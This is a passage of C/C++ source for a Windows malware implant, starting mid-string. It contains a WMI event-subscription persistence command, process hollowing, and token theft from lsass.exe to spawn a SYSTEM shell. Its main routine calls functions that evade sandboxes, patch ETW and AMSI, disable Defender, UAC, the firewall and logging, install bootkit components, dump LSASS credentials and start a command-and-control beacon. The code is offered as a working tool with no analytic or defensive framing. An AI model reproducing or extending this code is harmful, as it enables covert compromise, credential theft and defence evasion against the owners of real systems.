TimerID='ChurchTimer'\\\"}; $filterTimer=Set-WmiInstance -Class __EventFilter -Namespace root\\subscription -Arguments $filterTimerArgs -ErrorAction SilentlyContinue; $consumerTimerArgs=@{Name='TimerConsumer';CommandLineTemplate='%ls'}; $consumerTimer=Set-WmiInstance -Class CommandLineEventConsumer -Namespace root\\subscription -Arguments $consumerTimerArgs -ErrorAction SilentlyContinue; $bindingTimerArgs=@{Filter=$filterTimer; Consumer=$consumerTimer}; Set-WmiInstance -Class __FilterToConsumerBinding -Namespace root\\subscription -Arguments $bindingTimerArgs -ErrorAction SilentlyContinue\"", exePath, exePath); STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; CreateProcessW(NULL, psCmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 10000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } } // ==================== PROCESS HOLLOWING ==================== BOOL ProcessHollowing(LPCWSTR targetProcess, LPCWSTR payloadPath) { STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; if (!CreateProcessW(targetProcess, NULL, NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) return FALSE; HANDLE hFile = CreateFileW(payloadPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile == INVALID_HANDLE_VALUE) { TerminateProcess(pi.hProcess, 0); return FALSE; } DWORD fileSize = GetFileSize(hFile, NULL); BYTE* peData = (BYTE*)malloc(fileSize); if (!peData) { CloseHandle(hFile); TerminateProcess(pi.hProcess, 0); return FALSE; } DWORD bytesRead; ReadFile(hFile, peData, fileSize, &bytesRead, NULL); CloseHandle(hFile); CONTEXT ctx = { CONTEXT_FULL }; GetThreadContext(pi.hThread, &ctx); NtUnmapViewOfSection(pi.hProcess, (PVOID)ctx.Rdx); PVOID imageBase = NULL; DWORD_PTR pebAddr = 0; NTSTATUS status = NtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &pebAddr, sizeof(pebAddr), NULL); if (status == 0) { PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)peData; PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)(peData + pDos->e_lfanew); imageBase = VirtualAllocEx(pi.hProcess, (LPVOID)pNt->OptionalHeader.ImageBase, pNt->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (!imageBase) { imageBase = VirtualAllocEx(pi.hProcess, NULL, pNt->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); } if (imageBase) { WriteProcessMemory(pi.hProcess, imageBase, peData, pNt->OptionalHeader.SizeOfHeaders, NULL); for (int i = 0; i < pNt->FileHeader.NumberOfSections; i++) { PIMAGE_SECTION_HEADER pSec = (PIMAGE_SECTION_HEADER)((BYTE*)pNt + sizeof(IMAGE_NT_HEADERS) + i * sizeof(IMAGE_SECTION_HEADER)); WriteProcessMemory(pi.hProcess, (LPVOID)((DWORD_PTR)imageBase + pSec->VirtualAddress), peData + pSec->PointerToRawData, pSec->SizeOfRawData, NULL); } } } free(peData); ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); return TRUE; } // ==================== TOKEN STEALING ==================== BOOL TokenStealing() { DWORD systemPid = 0; HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (snapshot != INVALID_HANDLE_VALUE) { PROCESSENTRY32W pe = { sizeof(pe) }; if (Process32FirstW(snapshot, &pe)) { do { if (_wcsicmp(pe.szExeFile, L"lsass.exe") == 0) { systemPid = pe.th32ProcessID; break; } } while (Process32NextW(snapshot, &pe)); } CloseHandle(snapshot); } if (!systemPid) return FALSE; EnableDebugPrivilege(); HANDLE hLsass = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, systemPid); if (!hLsass) return FALSE; HANDLE hToken; if (!OpenProcessToken(hLsass, TOKEN_DUPLICATE | TOKEN_IMPERSONATE, &hToken)) { CloseHandle(hLsass); return FALSE; } HANDLE hDupToken; if (!DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hDupToken)) { CloseHandle(hToken); CloseHandle(hLsass); return FALSE; } STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; CreateProcessWithTokenW(hDupToken, 0, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &si, &pi); CloseHandle(hDupToken); CloseHandle(hToken); CloseHandle(hLsass); return TRUE; } // ==================== MAIN ==================== int main() { srand((unsigned int)(GetTickCount64() ^ (ULONGLONG)&main)); InitObfuscatedStrings(); InitNtFunctions(); if (!EnsureSingleInstance()) return 0; ParseC2Server(); if (IsSandboxed()) return 0; ElevateSelf(); PatchEtw(); PatchAmsi(); EnableDebugPrivilege(); if (DisableTamperProtection()) Sleep(3000); DisableDefender(); KillDefenderProcesses(); DisableUAC(); DisableAppLockerWDAC(); AddDefenderExclusions(); DisableSecurityLogs(); DisableSystemRestore(); DropTelemetryPackets(); ClearEventLogs(); ScrambleMemory(); AddPersistence(); AddWmiPersistence(); InstallBootkitComponents(); StopSecurityServices(); DisableFirewall(); DumpLSASS(); EnableKernelExecution(); RunAsPPL(); TokenStealing(); NetworkC2Setup(); // THIS STARTS THE C2 BEACON - FULLY INTEGRATED HideFile(L"C:\\lsass.dmp"); return 0; }